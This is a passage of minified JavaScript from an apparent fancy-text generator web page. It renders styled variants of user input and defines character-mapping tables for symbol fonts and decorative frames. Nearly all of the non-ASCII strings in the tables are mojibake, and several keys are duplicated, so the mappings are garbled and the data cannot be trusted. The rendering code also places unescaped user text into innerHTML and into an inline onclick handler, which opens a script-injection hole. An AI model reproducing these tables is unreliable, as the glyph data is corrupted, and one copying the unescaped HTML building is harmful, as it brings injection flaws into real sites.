            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n", r += '<span><span>' + function (t) {
                return t.split("").join("Í“Ì½") + "Í“Ì½"
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + "Wingdings: " + function (t) {
                return t.split("").map(function (t) {
                    return a[t] ? a[t] : t
                }).join("")
            }(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + J(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + J(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + J(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + J(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + J(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + at(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + at(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + at(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + at(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<span><span>' + at(t)  + '</span><a href="#" class="btn-copiring"></a></span>' + "\n\n",
                r += '<div id="moreFontsCtn"></div>', r += '<div class="control-btn-block"><button class="insta-btn" onclick="moreFontsCtn.innerHTML += loadMoreFonts(\''.concat(t, "')\">Load More</button> </div>"), document.querySelector("#output").innerHTML = r.trim()
        document.querySelectorAll('.btn-copiring').forEach(function (trg) { trg.addEventListener('click', copyToClipboard) })
        } else document.querySelector("#output").innerHTML = ""
    }
    o.tools.creepify.options.maxHeight = 10,
        window.loadMoreFonts = function (t) {
        for (var n = "", r = 0; r < 15; r++) {
            n += '<span><span>'+(Math.random() < .7 ? u(st(t), 2) : h(st(t))) + '</span><a href="#" onclick="copyToClipboard(event)" class="btn-copiring"></a></span>'+"\n\n"
        }
        return n
    };
    var a = {
        0: "ðŸ“ï¸Ž",
        1: "ðŸ“‚ï¸Ž",
        2: "ðŸ“„ï¸Ž",
        3: "ðŸ—ï¸Ž",
        4: "ðŸ—ï¸Ž",
        5: "ðŸ—„ï¸Ž",
        6: "âŒ›ï¸Ž",
        7: "ðŸ–®ï¸Ž",
        8: "ðŸ–°ï¸Ž",
        9: "ðŸ–²ï¸Ž",
        "!": "âœï¸Ž",
        '"': "âœ‚ï¸Ž",
        "#": "âœï¸Ž",
        $: "ðŸ‘“ï¸Ž",
        "%": "ðŸ•­ï¸Ž",
        "&": "ðŸ•®ï¸Ž",
        "'": "ðŸ•¯ï¸Ž",
        "(": "ðŸ•¿ï¸Ž",
        ")": "âœ†ï¸Ž",
        "*": "ðŸ–‚ï¸Ž",
        "+": "ðŸ–ƒï¸Ž",
        ",": "ðŸ“ªï¸Ž",
        "-": "ðŸ“«ï¸Ž",
        ".": "ðŸ“¬ï¸Ž",
        "/": "ðŸ“­ï¸Ž",
        ":": "ðŸ–³ï¸Ž",
        ";": "ðŸ–´ï¸Ž",
        "<": "ðŸ–«ï¸Ž",
        "=": "ðŸ–¬ï¸Ž",
        ">": "âœ‡ï¸Ž",
        "?": "âœï¸Ž",
        A: "âœŒï¸Ž",
        B: "ðŸ‘Œï¸Ž",
        C: "ðŸ‘ï¸Ž",
        D: "ðŸ‘Žï¸Ž",
        E: "â˜œï¸Ž",
        F: "â˜žï¸Ž",
        G: "â˜ï¸Ž",
        H: "â˜Ÿï¸Ž",
        I: "âœ‹ï¸Ž",
        J: "â˜ºï¸Ž",
        K: "ðŸ˜ï¸Ž",
        L: "â˜¹ï¸Ž",
        M: "ðŸ’£ï¸Ž",
        N: "â˜ ï¸Ž",
        O: "âšï¸Ž",
        P: "ðŸ±ï¸Ž",
        Q: "âœˆï¸Ž",
        R: "â˜¼ï¸Ž",
        S: "ðŸ’§ï¸Ž",
        T: "â„ï¸Ž",
        U: "ðŸ•†ï¸Ž",
        V: "âœžï¸Ž",
        W: "ðŸ•ˆï¸Ž",
        X: "âœ ï¸Ž",
        Y: "âœ¡ï¸Ž",
        Z: "â˜ªï¸Ž",
        "[": "â˜¯ï¸Ž",
        "\\": "à¥ï¸Ž",
        "]": "â˜¸ï¸Ž",
        "^": "â™ˆï¸Ž",
        _: "â™‰ï¸Ž",
        "`": "â™Šï¸Ž",
        a: "â™‹ï¸Ž",
        b: "â™Œï¸Ž",
        c: "â™ï¸Ž",
        d: "â™Žï¸Ž",
        e: "â™ï¸Ž",
        f: "â™ï¸Ž",
        g: "â™‘ï¸Ž",
        h: "â™’ï¸Ž",
        i: "â™“ï¸Ž",
        j: "ðŸ™°",
        k: "ðŸ™µ",
        l: "â—ï¸Ž",
        m: "âï¸Ž",
        n: "â– ï¸Ž",
        o: "â–¡ï¸Ž",
        p: "â—»ï¸Ž",
        q: "â‘ï¸Ž",
        r: "â’ï¸Ž",
        s: "â¬§ï¸Ž",
        t: "â§«ï¸Ž",
        u: "â—†ï¸Ž",
        v: "â–ï¸Ž",
        w: "â¬¥ï¸Ž",
        x: "âŒ§ï¸Ž",
        y: "â“ï¸Ž",
        z: "âŒ˜ï¸Ž",
        "{": "â€ï¸Ž",
        "|": "âœ¿ï¸Ž",
        "}": "âï¸Ž",
        "~": "âžï¸Ž",
        "": "â–¯ï¸Ž",
        "â‚¬": "â“ªï¸Ž",
        "Â": "â‘ ï¸Ž",
        "â€š": "â‘¡ï¸Ž",
        "Æ’": "â‘¢ï¸Ž",
        "â€ž": "â‘£ï¸Ž",
        "â€¦": "â‘¤ï¸Ž",
        "â€ ": "â‘¥ï¸Ž",
        "â€¡": "â‘¦ï¸Ž",
        "Ë†": "â‘§ï¸Ž",
        "â€°": "â‘¨ï¸Ž",
        "Å ": "â‘©ï¸Ž",
        "â€¹": "â“¿ï¸Ž",
        "Å’": "â¶ï¸Ž",
        "Â": "â·ï¸Ž",
        "Å½": "â¸ï¸Ž",
        "Â": "â¹ï¸Ž",
        "Â": "âºï¸Ž",
        "â€˜": "â»ï¸Ž",
        "â€™": "â¼ï¸Ž",
        "â€œ": "â½ï¸Ž",
        "â€": "â¾ï¸Ž",
        "â€¢": "â¿ï¸Ž",
        "â€“": "â—»ï¸Ž",
        "â€”": "â—»ï¸Ž",
        "Ëœ": "â—»ï¸Ž",
        "â„¢": "â—»ï¸Ž",
        "Å¡": "â—»ï¸Ž",
        "â€º": "â—»ï¸Ž",
        "Å“": "â—»ï¸Ž",
        "Â": "â—»ï¸Ž",
        "Å¾": "Â·ï¸Ž",
        "Å¸": "â€¢ï¸Ž",
        "Â¡": "â—‹ï¸Ž",
        "Â¢": "â­•ï¸Ž",
        "Â£": "â—»ï¸Ž",
        "Â¤": "â—‰ï¸Ž",
        "Â¥": "â—Žï¸Ž",
        "Â¦": "â—»ï¸Ž",
        "Â§": "â–ªï¸Ž",
        "Â¨": "â—»ï¸Ž",
        "Â©": "â—»ï¸Ž",
        "Âª": "âœ¦ï¸Ž",
        "Â«": "â˜…ï¸Ž",
        "Â¬": "âœ¶ï¸Ž",
        "Â®": "âœ¹ï¸Ž",
        "Â¯": "âœµï¸Ž",
        "Â°": "â—»ï¸Ž",
        "Â±": "âŒ–ï¸Ž",
        "Â²": "âŸ¡ï¸Ž",
        "Â³": "âŒ‘ï¸Ž",
        "Â´": "â—»ï¸Ž",
        "Âµ": "âœªï¸Ž",
        "Â¶": "âœ°ï¸Ž",
        "Â·": "ðŸ•ï¸Ž",
        "Â¸": "ðŸ•‘ï¸Ž",
        "Â¹": "ðŸ•’ï¸Ž",
        "Âº": "ðŸ•“ï¸Ž",
        "Â»": "ðŸ•”ï¸Ž",
        "Â¼": "ðŸ••ï¸Ž",
        "Â½": "ðŸ•–ï¸Ž",
        "Â¾": "ðŸ•—ï¸Ž",
        "Â¿": "ðŸ•˜ï¸Ž",
        "Ã€": "ðŸ•™ï¸Ž",
        "Ã": "ðŸ•šï¸Ž",
        "Ã‚": "ðŸ•›ï¸Ž",
        "Ãƒ": "â—»ï¸Ž",
        "Ã„": "â—»ï¸Ž",
        "Ã…": "â—»ï¸Ž",
        "Ã†": "â—»ï¸Ž",
        "Ã‡": "â—»ï¸Ž",
        "Ãˆ": "â—»ï¸Ž",
        "Ã‰": "â—»ï¸Ž",
        "ÃŠ": "â—»ï¸Ž",
        "Ã‹": "â—»ï¸Ž",
        "ÃŒ": "â—»ï¸Ž",
        "Ã": "â—»ï¸Ž",
        "ÃŽ": "â—»ï¸Ž",
        "Ã": "â—»ï¸Ž",
        "Ã": "â—»ï¸Ž",
        "Ã‘": "â—»ï¸Ž",
        "Ã’": "â—»ï¸Ž",
        "Ã“": "â—»ï¸Ž",
        "Ã”": "â—»ï¸Ž",
        "Ã•": "âŒ«ï¸Ž",
        "Ã–": "âŒ¦ï¸Ž",
        "Ã—": "â—»ï¸Ž",
        "Ã˜": "âž¢ï¸Ž",
        "Ã™": "â—»ï¸Ž",
        "Ãš": "â—»ï¸Ž",
        "Ã›": "â—»ï¸Ž",
        "Ãœ": "âž²ï¸Ž",
        "Ã": "â—»ï¸Ž",
        "Ãž": "â—»ï¸Ž",
        "ÃŸ": "â—»ï¸Ž",
        "Ã ": "â—»ï¸Ž",
        "Ã¡": "â—»ï¸Ž",
        "Ã¢": "â—»ï¸Ž",
        "Ã£": "â—»ï¸Ž",
        "Ã¤": "â—»ï¸Ž",
        "Ã¥": "â—»ï¸Ž",
        "Ã¦": "â—»ï¸Ž",
        "Ã§": "â—»ï¸Ž",
        "Ã¨": "âž”ï¸Ž",
        "Ã©": "â—»ï¸Ž",
        "Ãª": "â—»ï¸Ž",
        "Ã«": "â—»ï¸Ž",
        "Ã¬": "â—»ï¸Ž",
        "Ã­": "â—»ï¸Ž",
        "Ã®": "â—»ï¸Ž",
        "Ã¯": "â‡¦ï¸Ž",
        "Ã°": "â‡¨ï¸Ž",
        "Ã±": "â‡§ï¸Ž",
        "Ã²": "â‡©ï¸Ž",
        "Ã³": "â¬„ï¸Ž",
        "Ã´": "â‡³ï¸Ž",
        "Ãµ": "â¬€ï¸Ž",
        "Ã¶": "â¬ï¸Ž",
        "Ã·": "â¬ƒï¸Ž",
        "Ã¸": "â¬‚ï¸Ž",
        "Ã¹": "â–­ï¸Ž",
        "Ãº": "â–«ï¸Ž",
        "Ã»": "âœ—ï¸Ž",
        "Ã¼": "âœ“ï¸Ž",
        "Ã½": "â˜’ï¸Ž",
        "Ã¾": "â˜‘ï¸Ž",
        "Ã¿": "â—»ï¸Ž"
    };
    var s = {
        " ": "ã€€",
        "`": "`",
        1: "ï¼‘",
        2: "ï¼’",
        3: "ï¼“",
        4: "ï¼”",
        5: "ï¼•",
        6: "ï¼–",
        7: "ï¼—",
        8: "ï¼˜",
        9: "ï¼™",
        0: "ï¼",
        "-": "ï¼",
        "=": "ï¼",
        "~": "~",
        "!": "ï¼",
        "@": "ï¼ ",
        "#": "ï¼ƒ",
        $: "ï¼„",
        "%": "ï¼…",
        "^": "^",
        "&": "ï¼†",
        "*": "ï¼Š",
        "(": "ï¼ˆ",
        ")": "ï¼‰",
        _: "_",
        "+": "ï¼‹",
        q: "ï½‘",
        w: "ï½—",
        e: "ï½…",
        r: "ï½’",
        t: "ï½”",
        y: "ï½™",
        u: "ï½•",
        i: "ï½‰",
        o: "ï½",
        p: "ï½",
        "[": "[",
        "]": "]",
        "\\": "\\",
        Q: "ï¼±",
        W: "ï¼·",
        E: "ï¼¥",
        R: "ï¼²",
        T: "ï¼´",
        Y: "ï¼¹",
        U: "ï¼µ",
        I: "ï¼©",
        O: "ï¼¯",
        P: "ï¼°",
        "{": "{",
        "}": "}",
        "|": "|",
        a: "ï½",
        s: "ï½“",
        d: "ï½„",
        f: "ï½†",
        g: "ï½‡",
        h: "ï½ˆ",
        j: "ï½Š",
        k: "ï½‹",
        l: "ï½Œ",
        ";": "ï¼›",
        "'": "ï¼‡",
        A: "ï¼¡",
        S: "ï¼³",
        D: "ï¼¤",
        F: "ï¼¦",
        G: "ï¼§",
        H: "ï¼¨",
        J: "ï¼ª",
        K: "ï¼«",
        L: "ï¼¬",
        ":": "ï¼š",
        '"': '"',
        z: "ï½š",
        x: "ï½˜",
        c: "ï½ƒ",
        v: "ï½–",
        b: "ï½‚",
        n: "ï½Ž",
        m: "ï½",
        ",": "ï¼Œ",
        ".": "ï¼Ž",
        "/": "ï¼",
        Z: "ï¼º",
        X: "ï¼¸",
        C: "ï¼£",
        V: "ï¼¶",
        B: "ï¼¢",
        N: "ï¼®",
        M: "ï¼­",
        "<": "<",
        ">": ">",
        "?": "ï¼Ÿ"
    };
    var c = ["à½§áœ°ê™°ê¦¿âž¢[[text]]à¼’", "ê§à¼’â˜¬[[text]]â˜¬à¼’ê§‚", "â˜…å½¡[[text]]å½¡â˜…", "â„ï¸[[text]]â„ï¸", "ðŸ’¤ðŸ“¿[[text]]ðŸ“¿ðŸ’¤", "âš¡[[text]]âš¡", "à¹–Û£Ûœ[[text]]à¼»à¿Œð–£˜", "âœžâ˜¬[[text]]â˜¬âœž", "âœžà¼’[[text]]à¼’âœž", "âœžâ˜ ï¸Ž[[text]]â˜ ï¸Žâœž", "âœžâœž[[text]]âœžâœž", "âœžà¦”à§£[[text]]à¦”à§£âœž", "à¼º[[text]]à¼»", "à¼’â€¢[[text]]â€¢à¼’", "ê§à¼’â€¢[[text]]â€¢à¼’ê§‚", "ê§ê§[[text]]ê§‚ê§‚", "ê§[[text]]ê§‚", "â˜†ê§[[text]]ê§‚â˜†", "â˜†ê§à¼’[[text]]à¼’ê§‚â˜†", "ê§â˜¬[[text]]â˜¬ê§‚", "â˜†ê§à¼’â˜¬[[text]]â˜¬à¼’ê§‚â˜†", "â˜…Â·.Â·Â´Â¯`Â·.Â·â˜… [[text]] â˜…Â·.Â·Â´Â¯`Â·.Â·â˜…", "â– â–‚ â–„ â–… â–† â–‡ â–ˆ [[text]] â–ˆ â–‡ â–† â–… â–„ â–‚ â–", "Â°Â°Â°Â·.Â°Â·..Â·Â°Â¯Â°Â·._.Â· [[text]] Â·._.Â·Â°Â¯Â°Â·.Â·Â° .Â·Â°Â°Â°", "Â¸,Ã¸Â¤ÂºÂ°`Â°ÂºÂ¤Ã¸,Â¸Â¸,Ã¸Â¤ÂºÂ° [[text]] Â°ÂºÂ¤Ã¸,Â¸Â¸,Ã¸Â¤ÂºÂ°`Â°ÂºÂ¤Ã¸,Â¸", "Ä±llÄ±llÄ± [[text]] Ä±llÄ±llÄ±", "â€¢?((Â¯Â°Â·._.â€¢ [[text]] â€¢._.Â·Â°Â¯))ØŸâ€¢", "â–Œâ”‚â–ˆâ•‘â–Œâ•‘â–Œâ•‘ [[text]] â•‘â–Œâ•‘â–Œâ•‘â–ˆâ”‚â–Œ", "Ã—ÂºÂ°â€Ëœ`â€Â°ÂºÃ— [[text]] Ã—ÂºÂ°â€Ëœ`â€Â°ÂºÃ—", "â€¢â€¢â€¢Â´ÂºÂ´â€¢Â» [[text]] Â«â€¢Â´ÂºÂ´â€¢â€¢â€¢", "*â€¢.Â¸â™¡ [[text]] â™¡Â¸.â€¢*", "â•°â˜†â˜† [[text]] â˜†â˜†â•®", ".â€¢Â°Â¤*(Â¯`â˜…Â´Â¯)*Â¤Â° [[text]] Â°Â¤*(Â¯Â´â˜…`Â¯)*Â¤Â°â€¢.", "(Â¯Â´â€¢._.â€¢ [[text]] â€¢._.â€¢Â´Â¯)", "Â¸â€ž.-â€¢~Â¹Â°â€Ë†ËœÂ¨ [[text]] Â¨ËœË†â€Â°Â¹~â€¢-.â€žÂ¸", "â–‘â–’â–“â–ˆ [[text]] â–ˆâ–“â–’â–‘", "â–‘â–’â–“â–ˆâ–ºâ”€â•  [[text]] â•â”€â—„â–ˆâ–“â–’â–‘", "â˜…å½¡ [[text]] å½¡â˜…", "â€¢Â´Â¯`â€¢. [[text]] .â€¢Â´Â¯`â€¢", "Â§.â€¢Â´Â¨'Â°Ã·â€¢..Ã— [[text]] Ã—,.â€¢Â´Â¨'Â°Ã·â€¢..Â§", "â€¢Â°Â¯`â€¢â€¢ [[text]] â€¢â€¢Â´Â¯Â°â€¢", "(Â¯`*â€¢.Â¸,Â¤Â°Â´âœ¿.ï½¡.:* [[text]] *.:ï½¡.âœ¿`Â°Â¤,Â¸.â€¢*Â´Â¯)", "|!Â¤*'~``~'*Â¤!| [[text]] |!Â¤*'~``~'*Â¤!|", "â€¢._.â€¢â€¢Â´Â¯``â€¢.Â¸Â¸.â€¢` [[text]] `â€¢.Â¸Â¸.â€¢Â´Â´Â¯`â€¢â€¢._.â€¢", "Â¸â€ž.-â€¢~Â¹Â°â€Ë†ËœÂ¨ [[text]] Â¨ËœË†â€Â°Â¹~â€¢-.â€žÂ¸", "(Â¯Â´â€¢._.â€¢ [[text]] â€¢._.â€¢Â´Â¯)", "â€¢â€¢Â¤(`Ã—Â¤ [[text]] Â¤Ã—Â´)Â¤â€¢â€¢", "â€¢Â´Â¯`â€¢Â» [[text]] Â«â€¢Â´Â¯`â€¢", " .o0Ã—XÃ—0o. [[text]] .o0Ã—XÃ—0o.", "Â¤Â¸Â¸.â€¢Â´Â¯`â€¢Â¸Â¸.â€¢..>> [[text]] <<..â€¢.Â¸Â¸â€¢Â´Â¯`â€¢.Â¸Â¸Â¤", "â€”(â€¢â€¢Ã· [[text]] Ã·â€¢â€¢)â€”", "Â¸,Ã¸Â¤ÂºÂ°`Â°ÂºÂ¤Ã¸,Â¸ [[text]] Â¸,Ã¸Â¤ÂºÂ°`Â°ÂºÂ¤Ã¸,Â¸", "`â€¢.Â¸Â¸.â€¢Â´Â´Â¯`â€¢â€¢._.â€¢ [[text]] â€¢._.â€¢â€¢`Â¯Â´Â´â€¢.Â¸Â¸.â€¢`", ",-*' ^ '~*-.,_,.-*~ [[text]] ~*-.,_,.-*~' ^ '*-,", "`â€¢.,Â¸Â¸,.â€¢Â´Â¯ [[text]] Â¯`â€¢.,Â¸Â¸,.â€¢Â´", "â†¤â†¤â†¤â†¤â†¤ [[text]] â†¦â†¦â†¦â†¦â†¦", "âž¶âž¶âž¶âž¶âž¶ [[text]] âž·âž·âž·âž·âž·", "â†«â†«â†«â†«â†« [[text]] â†¬â†¬â†¬â†¬â†¬", "Â·.Â¸Â¸.Â·â™©â™ªâ™« [[text]] â™«â™ªâ™©Â·.Â¸Â¸.Â·", "ã€ï½¡_ï½¡ã€‘ [[text]] ã€ï½¡_ï½¡ã€‘", "|I{â€¢------Â» [[text]] Â«------â€¢}I|", "â–€â–„â–€â–„â–€â–„ [[text]] â–„â–€â–„â–€â–„â–€", "(-_-) [[text]] (-_-)", "â€¢Â´Â¯`â€¢. [[text]] .â€¢Â´Â¯`â€¢", "-æ¼«~*'Â¨Â¯Â¨'*Â·èˆž~ [[text]] ~èˆž*'Â¨Â¯Â¨'*Â·~æ¼«-", "à¹‘Ûžà¹‘,Â¸Â¸,Ã¸Â¤ÂºÂ°`Â°à¹‘Û© [[text]] à¹‘Û© ,Â¸Â¸,Ã¸Â¤ÂºÂ°`Â°à¹‘Ûžà¹‘", ".â€¢Â°Â¤*(Â¯`â˜…Â´Â¯)*Â¤Â° [[text]] Â°Â¤*(Â¯Â´â˜…`Â¯)*Â¤Â°â€¢.", "â€¢â€¢.â€¢Â´Â¯`â€¢.â€¢â€¢ [[text]] â€¢â€¢.â€¢Â´Â¯`â€¢.â€¢â€¢", "Â¤Â¸Â¸.â€¢Â´Â¯`â€¢Â¸Â¸.â€¢..>> [[text]] <<..â€¢.Â¸Â¸â€¢Â´Â¯`â€¢.Â¸Â¸Â¤", "â—¦â€¢â—â—‰âœ¿ [[text]] âœ¿â—‰â—â€¢â—¦", "â•šÂ»â˜…Â«â• [[text]] â•šÂ»â˜…Â«â•", "-Â·=Â»â€¡Â«=Â·- [[text]] -Â·=Â»â€¡Â«=Â·-", "âˆ™âˆ™Â·â–«â–«áµ’á´¼áµ’â–«â‚’â‚’â–«áµ’á´¼áµ’â–«â‚’â‚’â–«áµ’á´¼áµ’ [[text]] áµ’á´¼áµ’â–«â‚’â‚’â–«áµ’á´¼áµ’â–«â‚’â‚’â–«áµ’á´¼áµ’â–«â–«Â·âˆ™âˆ™", "Â¸Â¸â™¬Â·Â¯Â·â™©Â¸Â¸â™ªÂ·Â¯Â·â™«Â¸Â¸ [[text]] Â¸Â¸â™«Â·Â¯Â·â™ªÂ¸Â¸â™©Â·Â¯Â·â™¬Â¸Â¸", "à®œÛ©ÛžÛ©à®œ [[text]] à®œÛ©ÛžÛ©à®œ", "Â¤ (Â¯Â´â˜†âœ­.Â¸_)Â¤ [[text]] Â¤(_Â¸.âœ­â˜†Â´Â¯) Â¤", "(Â¯`Â·.Â¸Â¸.Â·Â´Â¯`Â·.Â¸Â¸.-> [[text]] <-.Â¸Â¸.Â·Â´Â¯`Â·.Â¸Â¸.Â·Â´Â¯)", "âœ¿.ï½¡.:* â˜†:**:. [[text]] .:**:.â˜†*.:ï½¡.âœ¿", ".â€¢â™«â€¢â™¬â€¢ [[text]] â€¢â™¬â€¢â™«â€¢.", "áƒ¦(Â¯`â—•â€¿â—•Â´Â¯) â™« â™ª â™« [[text]] â™« â™ª â™« (Â¯`â—•â€¿â—•Â´Â¯)áƒ¦", "Â«-(Â¯`vÂ´Â¯)-Â« [[text]] Â»-(Â¯`vÂ´Â¯)-Â»"];



    function h(t) {
        return c[Math.floor(Math.random() * c.length)].replace("[[text]]", t)
    }

    function u(t, n) {
        return ht(n) + "  " + t + "  " + ht(n)
    }

    function d(t, n) {
        var r = "", i = !0, o = !1, e = void 0;
        try {
            for (var a, s = n.split("")[Symbol.iterator](); !(i = (a = s.next()).done); i = !0) {
                var c = a.value;
                void 0 !== t[c] ? r += t[c] : void 0 !== t[c.toLowerCase()] ? r += t[c.toLowerCase()] : r += c
            }
        } catch (t) {
            o = !0, e = t
        } finally {
            try {
                i || null == s.return || s.return()
            } finally {
                if (o) throw e
            }
        }
        return r
    }

    var f = {
        0: "ðŸ˜",
        1: "ðŸ™",
        2: "ðŸš",
        3: "ðŸ›",
        4: "ðŸœ",
        5: "ðŸ",
        6: "ðŸž",
        7: "ðŸŸ",
        8: "ðŸ ",
        9: "ðŸ¡",
        a: "êª–",
        b: "á¥‡",
        c: "á¥´",
        d: "á¦”",
        e: "ê«€",
        f: "á »",
        g: "á§",
        h: "ê«",
        i: "â…ˆ",
        j: "ð•›",
        k: "ð•œ",
        l: "êª¶",
        m: "êª‘",
        n: "êª€",
        o: "êª®",
        p: "Ï",
        q: "ð•¢",
        r: "ð•£",
        s: "àª¡",
        t: "ð•¥",
        u: "êªŠ",
        v: "êªœ",
        w: "á­™",
        x: "á¥Š",
        y: "êª—",
        z: "ð•«",
        A: "êª–",
        B: "á¥‡",
        C: "á¥´",
        D: "á¦”",
        E: "ê«€",
        F: "á »",
        G: "á§",
        H: "ê«",
        I: "â…ˆ",
        J: "ð•›",
        K: "ð•œ",
        L: "êª¶",
        M: "êª‘",
        N: "êª€",
        O: "êª®",
        P: "Ï",
        Q: "ð•¢",
        R: "ð•£",
        S: "àª¡",
        T: "ð•¥",
        U: "êªŠ",
        V: "êªœ",
        W: "á­™",
        X: "á¥Š",
        Y: "êª—",
        Z: "ð•«"
    }, p = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "á—©",
        b: "á—·",
        c: "á‘¢",
        d: "á•²",
        e: "á˜¿",
        f: "á–´",
        g: "á˜œ",
        h: "á•¼",
        i: "á“°",
        j: "á’š",
        k: "á–½á¸",
        l: "á’ª",
        m: "á˜»",
        n: "á˜‰",
        o: "á“",
        p: "á•µ",
        q: "á•´",
        r: "á–‡",
        s: "S",
        t: "á–¶",
        u: "á‘˜",
        v: "áº",
        w: "á˜º",
        x: "á™­",
        y: "á–»",
        z: "á—±",
        A: "á—©",
        B: "á—·",
        C: "á‘¢",
        D: "á•²",
        E: "á˜¿",
        F: "á–´",
        G: "á˜œ",
        H: "á•¼",
        I: "á“°",
        J: "á’š",
        K: "á–½á¸",
        L: "á’ª",
        M: "á˜»",
        N: "á˜‰",
        O: "á“",
        P: "á•µ",
        Q: "á•´",
        R: "á–‡",
        S: "S",
        T: "á–¶",
        U: "á‘˜",
        V: "áº",
        W: "á˜º",
        X: "á™­",
        Y: "á–»",
        Z: "á—±"
    }, m = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "à¸„",
        b: "à¹–",
        c: "Â¢",
        d: "à»“",
        e: "Ä“",
        f: "f",
        g: "àº‡",
        h: "h",
        i: "i",
        j: "à¸§",
        k: "k",
        l: "l",
        m: "à¹“",
        n: "àº–",
        o: "à»",
        p: "p",
        q: "à¹‘",
        r: "r",
        s: "Åž",
        t: "t",
        u: "à¸™",
        v: "à¸‡",
        w: "àºŸ",
        x: "x",
        y: "à¸¯",
        z: "àºŠ",
        A: "à¸„",
        B: "à¹–",
        C: "Â¢",
        D: "à»“",
        E: "Ä“",
        F: "f",
        G: "àº‡",
        H: "h",
        I: "i",
        J: "à¸§",
        K: "k",
        L: "l",
        M: "à¹“",
        N: "àº–",
        O: "à»",
        P: "p",
        Q: "à¹‘",
        R: "r",
        S: "Åž",
        T: "t",
        U: "à¸™",
        V: "à¸‡",
        W: "àºŸ",
        X: "x",
        Y: "à¸¯",
        Z: "àºŠ"
    }, l = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "Ä…",
        b: "áƒª",
        c: "Æˆ",
        d: "É–",
        e: "É›",
        f: "Ê„",
        g: "É ",
        h: "É§",
        i: "Ä±",
        j: "Ê",
        k: "Æ™",
        l: "Æ–",
        m: "É±",
        n: "Å‹",
        o: "Æ¡",
        p: "â„˜",
        q: "Õ¦",
        r: "à½ž",
        s: "Ê‚",
        t: "É¬",
        u: "Å³",
        v: "Û·",
        w: "á¿³",
        x: "Ò³",
        y: "áƒ§",
        z: "Ê‘",
        A: "Ä…",
        B: "áƒª",
        C: "Æˆ",
        D: "É–",
        E: "É›",
        F: "Ê„",
        G: "É ",
        H: "É§",
        I: "Ä±",
        J: "Ê",
        K: "Æ™",
        L: "Æ–",
        M: "É±",
        N: "Å‹",
        O: "Æ¡",
        P: "â„˜",
        Q: "Õ¦",
        R: "à½ž",
        S: "Ê‚",
        T: "É¬",
        U: "Å³",
        V: "Û·",
        W: "á¿³",
        X: "Ò³",
        Y: "áƒ§",
        Z: "Ê‘"
    }, C = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "ï¾‘",
        b: "ä¹ƒ",
        c: "á„ƒ",
        d: "ã‚Š",
        e: "ä¹‡",
        f: "ï½·",
        g: "ãƒ ",
        h: "ã‚“",
        i: "ï¾‰",
        j: "ï¾Œ",
        k: "ã‚º",
        l: "ï¾š",
        m: "ï¾¶",
        n: "åˆ€",
        o: "ã®",
        p: "ï½±",
        q: "ã‚",
        r: "å°º",
        s: "ä¸‚",
        t: "ï½²",
        u: "ã²",
        v: "âˆš",
        w: "W",
        x: "ï¾’",
        y: "ï¾˜",
        z: "ä¹™",
        A: "ï¾‘",
        B: "ä¹ƒ",
        C: "á„ƒ",
        D: "ã‚Š",
        E: "ä¹‡",
        F: "ï½·",
        G: "ãƒ ",
        H: "ã‚“",
        I: "ï¾‰",
        J: "ï¾Œ",
        K: "ã‚º",
        L: "ï¾š",
        M: "ï¾¶",
        N: "åˆ€",
        O: "ã®",
        P: "ï½±",
        Q: "ã‚",
        R: "å°º",
        S: "ä¸‚",
        T: "ï½²",
        U: "ã²",
        V: "âˆš",
        W: "W",
        X: "ï¾’",
        Y: "ï¾˜",
        Z: "ä¹™"
    }, g = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "å‚",
        b: "ä¹ƒ",
        c: "åŒš",
        d: "á—ª",
        e: "ä¹‡",
        f: "åƒ",
        g: "áŽ¶",
        h: "å„",
        i: "ä¸¨",
        j: "ï¾Œ",
        k: "Òœ",
        l: "ã„¥",
        m: "çˆª",
        n: "å‡ ",
        o: "ã„–",
        p: "å©",
        q: "ÉŠ",
        r: "å°º",
        s: "ä¸‚",
        t: "ã„’",
        u: "ã„©",
        v: "á¯",
        w: "å±±",
        x: "ä¹‚",
        y: "ã„š",
        z: "ä¹™",
        A: "å‚",
        B: "ä¹ƒ",
        C: "åŒš",
        D: "á—ª",
        E: "ä¹‡",
        F: "åƒ",
        G: "áŽ¶",
        H: "å„",
        I: "ä¸¨",
        J: "ï¾Œ",
        K: "Òœ",
        L: "ã„¥",
        M: "çˆª",
        N: "å‡ ",
        O: "ã„–",
        P: "å©",
        Q: "ÉŠ",
        R: "å°º",
        S: "ä¸‚",
        T: "ã„’",
        U: "ã„©",
        V: "á¯",
        W: "å±±",
        X: "ä¹‚",
        Y: "ã„š",
        Z: "ä¹™"
    }, x = {
        0: "0",
        1: "1",
        2: "2",
        3: "3",
        4: "4",
        5: "5",
        6: "6",
        7: "7",
        8: "8",
        9: "9",
        a: "ðŸ„°",
        b: "ðŸ„±",
        c: "ðŸ„²",
        d: "ðŸ„³",
        e: "ðŸ„´",
        f: "ðŸ„µ",
        g: "ðŸ„¶",
        h: "ðŸ„·",
        i: "ðŸ„¸",
        j: "ðŸ„¹",
        k: "ðŸ„º",
